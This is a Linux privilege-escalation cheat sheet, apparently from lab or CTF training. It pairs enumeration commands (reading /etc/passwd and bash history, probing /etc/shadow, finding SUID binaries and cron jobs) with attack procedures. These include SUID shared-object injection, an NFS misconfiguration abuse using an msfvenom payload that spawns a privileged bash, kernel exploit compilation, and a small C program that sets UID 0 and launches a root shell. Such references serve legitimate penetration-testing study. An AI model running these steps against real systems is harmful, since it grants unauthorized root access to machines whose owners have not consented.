Linux Privilege Escalation

OS & User Enumeration :

############################### User Enumeration ################################

whoami
id
sudo -l
cat /etc/passwd
ls -la /etc/shadow

################################# OS Enumeration #################################

cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --verion

################################# Installed tools ################################

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

############################ File owners and permissions #########################

ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -user <username> -readable 2> /dev/null # Readable files for user
find / -writable -type d 2>/dev/null # Writable files by the user
find /usr/local/ -type d -writable

################################## File mount ####################################

/mnt /media -> usb devices and other mounted disks
mount -> show all the mounted drives
df -h -> list all partitions
cat /etc/fstab # list all drives mounted at boot time
/bin/lsblk

#################################### Applications ################################

dpkg -l # for Debian based systems

##################################### Cron tabs ##################################

ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron*           # Locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log   # for locating running jobs from logs
grep CRON /var/log/syslog       # grepping cron from syslog


#################################### Internal Ports ##############################

Netstat -alnp | grep LIST | grep port_num
Netstat -antp
netstat -tulnp
curl the listening ports

################################### Interesting DIRS #############################
 /
 /dev 
 /scripts 
 /opt 
 /mnt 
 /var/www/html 
 /var 
 /etc 
 /media
 /backup

################################### SUID Binaries ################################

(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

################################# Firewall Enumeration ###########################

grep -Hs iptables /etc/*

############################### Kernal Modules ##################################

lsmod
/sbin/modinfo <mod name>

PrivEsc Checklist :

SUID Shared Object Injection :

  • Find a SUID binary that looks fishy

  • strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

  • Match the shared object that sits in a path where you have write access

  • create a shared object in the missing SO file name

  • run the SUID binary

NFS Misconfiguration :

https://tryhackme.com/room/linuxprivesc (Task 19)

  • cat /etc/exports

  • On Kali

    • mkdir /tmp/nfs

    • mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs

    • msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

    • chmod +xs /tmp/nfs/shell.elf

  • On Target

    • /tmp/shell.elf

Kernel Exploits

  • cat /proc/version

  • uname -r

  • uname -mrs

  • cat /etc/lsb-release

  • cat /etc/os-release

  • gcc exploit.c -o exp

  • Compile exploit in local machine and upload to remote machine

    • gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

    • apt-get install gcc-multilib

Recover Deleted Files :

C Program to SetUID /bin/bash :

gcc -Wall suid.c -o exploit

sudo chown root exploit

sudo chmod u+s exploit

$ ls -l exploit -rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit

#include <unistd.h>

int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

./exploit # whoami root

Tools :

Resources :

Last updated